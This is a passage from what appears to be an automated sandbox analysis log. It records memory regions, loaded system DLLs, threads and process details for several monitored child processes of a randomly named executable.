"\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 6210 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 6211 start_va = 0x840000 end_va = 0x9c7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000840000" filename = "" Region: id = 6212 start_va = 0x77150000 end_va = 0x7717afff monitored = 0 entry_point = 0x77155680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Thread: id = 214 os_tid = 0x960 Thread: id = 222 os_tid = 0xf2c Process: id = "60" image_name = "-zetrxylspxh.exe" filename = "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe" page_root = "0xbd8e000" os_pid = "0x4e4" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x664" cmd_line = "\"C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5945 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 5946 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 5947 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 5948 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 5949 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 5950 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 5951 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 5952 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 5953 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 5954 start_va = 0x400000 end_va = 0x437fff monitored = 1 entry_point = 0x40312a region_type = mapped_file name = "-zetrxylspxh.exe" filename = "\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe" (normalized: "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe") Region: id = 5955 start_va = 0x77260000 end_va = 0x773dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 5956 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 5957 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5958 start_va = 0x7fff0000 end_va = 0x7ffc5f80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 5959 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5960 start_va = 0x7ffc5f9d1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffc5f9d1000" filename = "" Region: id = 6002 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 6003 start_va = 0x62ee0000 end_va = 0x62f2ffff monitored = 0 entry_point = 0x62ef8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 6004 start_va = 0x62f30000 end_va = 0x62fa9fff monitored = 0 entry_point = 0x62f43290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 6005 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 6006 start_va = 0x62fb0000 end_va = 0x62fb7fff monitored = 0 entry_point = 0x62fb17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 6023 start_va = 0x590000 end_va = 0x70ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 6024 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 6025 start_va = 0x76c20000 end_va = 0x76d9dfff monitored = 0 entry_point = 0x76cd1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 6026 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 6027 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 6133 start_va = 0x440000 end_va = 0x4fdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6134 start_va = 0x76300000 end_va = 0x76446fff monitored = 0 entry_point = 0x76311cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 6135 start_va = 0x76010000 end_va = 0x7615efff monitored = 0 entry_point = 0x760c6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 6136 start_va = 0x500000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 6137 start_va = 0x710000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000710000" filename = "" Region: id = 6138 start_va = 0x74a90000 end_va = 0x75e8efff monitored = 0 entry_point = 0x74c4b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 6139 start_va = 0x74290000 end_va = 0x7434dfff monitored = 0 entry_point = 0x742c5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 6140 start_va = 0x76fb0000 end_va = 0x76fe6fff monitored = 0 entry_point = 0x76fb3b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 6141 start_va = 0x764b0000 end_va = 0x769a8fff monitored = 0 entry_point = 0x766b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 6142 start_va = 0x76da0000 end_va = 0x76f5cfff monitored = 0 entry_point = 0x76e82a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 6143 start_va = 0x75f60000 end_va = 0x7600cfff monitored = 0 entry_point = 0x75f74f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 6144 start_va = 0x73f90000 end_va = 0x73fadfff monitored = 0 entry_point = 0x73f9b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 6145 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 6146 start_va = 0x73f80000 end_va = 0x73f89fff monitored = 0 entry_point = 0x73f82a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 6147 start_va = 0x75ef0000 end_va = 0x75f47fff monitored = 0 entry_point = 0x75f325c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 6148 start_va = 0x74a40000 end_va = 0x74a83fff monitored = 0 entry_point = 0x74a59d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 6149 start_va = 0x76a90000 end_va = 0x76b0afff monitored = 0 entry_point = 0x76aae970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 6150 start_va = 0x76f60000 end_va = 0x76fa4fff monitored = 0 entry_point = 0x76f7de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 6151 start_va = 0x74350000 end_va = 0x7435bfff monitored = 0 entry_point = 0x74353930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 6152 start_va = 0x77180000 end_va = 0x7720cfff monitored = 0 entry_point = 0x771c9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 6153 start_va = 0x77210000 end_va = 0x77253fff monitored = 0 entry_point = 0x77217410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 6154 start_va = 0x75f50000 end_va = 0x75f5efff monitored = 0 entry_point = 0x75f52e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 6231 start_va = 0x76b10000 end_va = 0x76bfafff monitored = 0 entry_point = 0x76b4d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 6232 start_va = 0x6f370000 end_va = 0x6f401fff monitored = 0 entry_point = 0x6f37dd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 6233 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 6234 start_va = 0x810000 end_va = 0x997fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000810000" filename = "" Region: id = 6235 start_va = 0x77150000 end_va = 0x7717afff monitored = 0 entry_point = 0x77155680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Thread: id = 215 os_tid = 0xeac Thread: id = 224 os_tid = 0xf7c Process: id = "61" image_name = "-zetrxylspxh.exe" filename = "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe" page_root = "0xbd93000" os_pid = "0x868" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x664" cmd_line = "\"C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5962 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 5963 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 5964 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 5965 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 5966 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 5967 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 5968 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 5969 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 5970 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 5971 start_va = 0x400000 end_va = 0x437fff monitored = 1 entry_point = 0x40312a region_type = mapped_file name = "-zetrxylspxh.exe" filename = "\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe" (normalized: "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe") Region: id = 5972 start_va = 0x77260000 end_va = 0x773dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 5973 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 5974 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5975 start_va = 0x7fff0000 end_va = 0x7ffc5f80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 5976 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5977 start_va = 0x7ffc5f9d1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffc5f9d1000" filename = "" Region: id = 6064 start_va = 0x480000 end_va = 0x48ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 6065 start_va = 0x62ee0000 end_va = 0x62f2ffff monitored = 0 entry_point = 0x62ef8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 6066 start_va = 0x62f30000 end_va = 0x62fa9fff monitored = 0 entry_point = 0x62f43290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 6067 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 6068 start_va = 0x62fb0000 end_va = 0x62fb7fff monitored = 0 entry_point = 0x62fb17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 6069 start_va = 0x490000 end_va = 0x5cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 6070 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 6071 start_va = 0x76c20000 end_va = 0x76d9dfff monitored = 0 entry_point = 0x76cd1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 6072 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 6073 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 6074 start_va = 0x5d0000 end_va = 0x68dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6165 start_va = 0x76300000 end_va = 0x76446fff monitored = 0 entry_point = 0x76311cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 6166 start_va = 0x76010000 end_va = 0x7615efff monitored = 0 entry_point = 0x760c6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 6167 start_va = 0x440000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 6168 start_va = 0x690000 end_va = 0x78ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 6169 start_va = 0x74a90000 end_va = 0x75e8efff monitored = 0 entry_point = 0x74c4b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 6170 start_va = 0x74290000 end_va = 0x7434dfff monitored = 0 entry_point = 0x742c5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 6171 start_va = 0x76fb0000 end_va = 0x76fe6fff monitored = 0 entry_point = 0x76fb3b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 6172 start_va = 0x764b0000 end_va = 0x769a8fff monitored = 0 entry_point = 0x766b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 6173 start_va = 0x76da0000 end_va = 0x76f5cfff monitored = 0 entry_point = 0x76e82a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 6174 start_va = 0x75f60000 end_va = 0x7600cfff monitored = 0 entry_point = 0x75f74f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 6175 start_va = 0x73f90000 end_va = 0x73fadfff monitored = 0 entry_point = 0x73f9b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 6176 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 6177 start_va = 0x73f80000 end_va = 0x73f89fff monitored = 0 entry_point = 0x73f82a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 6178 start_va = 0x75ef0000 end_va = 0x75f47fff monitored = 0 entry_point = 0x75f325c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 6179 start_va = 0x74a40000 end_va = 0x74a83fff monitored = 0 entry_point = 0x74a59d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 6180 start_va = 0x76a90000 end_va = 0x76b0afff monitored = 0 entry_point = 0x76aae970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 6181 start_va = 0x76f60000 end_va = 0x76fa4fff monitored = 0 entry_point = 0x76f7de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 6182 start_va = 0x74350000 end_va = 0x7435bfff monitored = 0 entry_point = 0x74353930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 6183 start_va = 0x77180000 end_va = 0x7720cfff monitored = 0 entry_point = 0x771c9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 6184 start_va = 0x77210000 end_va = 0x77253fff monitored = 0 entry_point = 0x77217410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 6185 start_va = 0x75f50000 end_va = 0x75f5efff monitored = 0 entry_point = 0x75f52e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 6186 start_va = 0x76b10000 end_va = 0x76bfafff monitored = 0 entry_point = 0x76b4d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 6236 start_va = 0x6f370000 end_va = 0x6f401fff monitored = 0 entry_point = 0x6f37dd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 6237 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 6238 start_va = 0x790000 end_va = 0x917fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000790000" filename = "" Region: id = 6239 start_va = 0x77150000 end_va = 0x7717afff monitored = 0 entry_point = 0x77155680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Thread: id = 216 os_tid = 0x11b0 Thread: id = 225 os_tid = 0x127c Process: id = "62" image_name = "-zetrxylspxh.exe" filename = "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe" page_root = "0x49798000" os_pid = "0x730" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x664" cmd_line = "\"C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5986 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 5987 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 5988 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 5989 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 5990 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 5991 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 5992 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 5993 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 5994 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 5995 start_va = 0x400000 end_va = 0x437fff monitored = 1 entry_point = 0x40312a region_type = mapped_file name = "-zetrxylspxh.exe" filename = "\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe" (normalized: "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe") Region: id = 5996 start_va = 0x77260000 end_va = 0x773dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 5997 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 5998 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5999 start_va = 